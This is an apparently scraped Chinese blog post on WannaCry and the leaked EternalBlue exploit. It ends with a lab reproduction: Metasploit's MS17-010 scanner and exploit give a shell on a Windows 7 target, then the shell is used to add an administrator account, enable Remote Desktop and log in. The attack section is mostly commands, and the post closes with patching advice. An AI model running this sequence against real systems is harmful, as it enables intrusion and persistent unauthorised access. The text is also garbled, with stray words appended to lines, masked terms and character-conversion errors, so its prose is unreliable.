2017年5月,被稱爲近10年來影響範圍最普遍「最囂張」的WannaCry勒索病毒席捲全球,據統計,全球共有150多個國家超30萬臺終端被感染,波及政府、學校、醫院、金融、航班等各行各業。html
一旦中了WannaCry病毒,則電腦文件會被「加密劫持」,***要求受害者支付高昂贖金(比特幣)才能拿到解密祕鑰。當時互聯網上有不少人確實嘗試經過支付贖金解決「被挾持的電腦」,畢竟多年的工做和學習資料比起贖金來說,價值更大。而實際上,不少人即使打錢過去,也無濟於事。shell
爲何WannaCry病毒可以在短短一個月時間,對全球形成這麼大的危害?這裏就必須提到今天的主角:「永恆之藍」。編程
時間追溯到2016年,全球神祕***組織影子經紀人( Shadow Brokers)***了另一支技術高超的***團隊
方程式組織(Equation Group),並拿到後者部分泄密武器。而方程式組織其實即是NSA(美國國家安全局)旗下的***團隊,正所以,由國家支持的「核武器級網絡軍火庫」正式浮出水面。c#
Shadow Brokers在拿到這批武器以後,原本打算以100萬比特幣(當時價值5億美圓)出售這批「網絡軍火庫」,但最終沒有人支付這筆天價費用。windows
直到2017年4月14號,Shadow Brokers乾脆直接在Github上公開整個武器庫,大量的針對Windows零日漏洞***武器被公開,其中,就包括了上面提到的「永恆之藍」***代碼。(Eternalblue) 安全
繞了這麼一大圈,其實就是想告訴你們一點:網絡
這枚WannaCry勒索病毒,就是***拿着美國安全局泄露的永恆之藍***代碼進行研製,並進行大肆勒索傳播。框架
關於這一點,微軟於2017年5月也公開指責NSA:「美國安全局正是全球勒索病毒的發源地,政府所持有的零日漏洞被泄露到公共領域,形成不可損失的破壞」ide
直到如今,不少普通用戶仍然單方面吐槽「這是由於Windows系統不夠安全」,把問題直接歸結於微軟。而實際上,在這件事情上,微軟纔是真正的「背鍋俠」,由於Windows系統在2017年3月14號就早早推送了MS17-010的安全更新,若用戶打上這個補丁,就能夠避免此次***。可是,大量的普通用戶沒有更新打補丁的習慣,更不用說那些採用Ghost盜版系統的用戶了。工具
雖然不少人已經從各類新聞報道和「我的經歷」已經知曉這枚病毒的威力,可是在這裏咱們仍是花了不少給你們普及了它的前因後果,並在這裏給你們一個觀點:
[WannaCry事件] 是21世紀網絡安全領域的一個標誌性事件,意味着:
國家級別的網絡安全對抗早就在祕密展開了,如今被一些***組織「戳破」了;
******事件已經徹底***到真實世界裏,「比特世界」和「原子世界」邊界完全被打破;
誰掌握零日漏洞以及對應的***武器,誰在「第五空間」就有話語權;
相似WannaCry的病毒會愈來愈多,而且頻率愈來愈高,例如Bad Rabbit、NotPetya……
Kali Linux 2017.03 + Windows 7 sp1
***機:Kali Linux (ip:172.16.70.216)
靶機:Windows 7 sp1 (ip:172.16.70.199)
永恆之藍漏洞剛出來的時候,當時不少人是用Shadow Brokers泄露的NSA原生***工具來測試,經過「 Fuzzbunch + Eternalblue 組合拳 」,雖然能夠作出getshell效果,可是整個實現過程很是麻煩,不太適合安全新手進行快速實踐。到了Kali Linux 2017.03和Kali Linux 2018版,神器Metasploit直接集成了MS17-010的***測試代碼,針對Win7和Server2008能夠實現getshell,幾分鐘內就能夠將完成整個漏洞復現過程。
注:此實驗環境所用***機和靶機,跟以前文章所分享一致,能夠參考往期推文,並下載所需鏡像=>
三、實驗流程
msfconsole
msf > search ms17_010
這裏能夠獲得兩個工具,其中auxiliary/scanner/smb/smb_ms17_010是永恆之藍掃描模塊,exploit/windows/smb/ms17_010_eternalblue是永恆之藍***代碼,通常配合使用,前者先掃描,若顯示有漏洞,再進行***。
使用模塊 msf > use auxiliary/scanner/smb/smb_ms17_010
設置目標IP或網段 msf auxiliary(smb_ms17_010) > set RHOSTS 172.16.70.199
執行掃描 msf auxiliary(smb_ms17_010) > run
使用模塊 msf > use exploit/windows/smb/ms17_010_eternalblue
查看可設置的選項 msf exploit(ms17_010_eternalblue) > show options
設置***目標ip msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.199
執行*** msf exploit(ms17_010_eternalblue) > exploit
從最終效果來看,此時Kali Linux經過MS17-010***代碼,直接拿到Win7的Shell,以後即可以經過Shell對目標靶機進行控制。
建立用戶名密碼 blue/blue net user blue blue /add
將用戶blue添加入管理組 net localgroup administrators blue /add
開啓遠程桌面功能 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali遠程桌面鏈接Win7 rdesktop 172.16.70.199:3389
能夠看到,最終Kali經過shell新建了用戶,並經過遠程桌面鏈接到目標靶機上。
固然,上面這是一個簡單的演示,告訴你們這個漏洞很危險,真正的***能作的事情更多,因此仍是要多打補丁或按照安全軟件。
①在線更新;開啓Windows Update更新。
②打補丁;此漏洞對應的微軟補丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010
=====================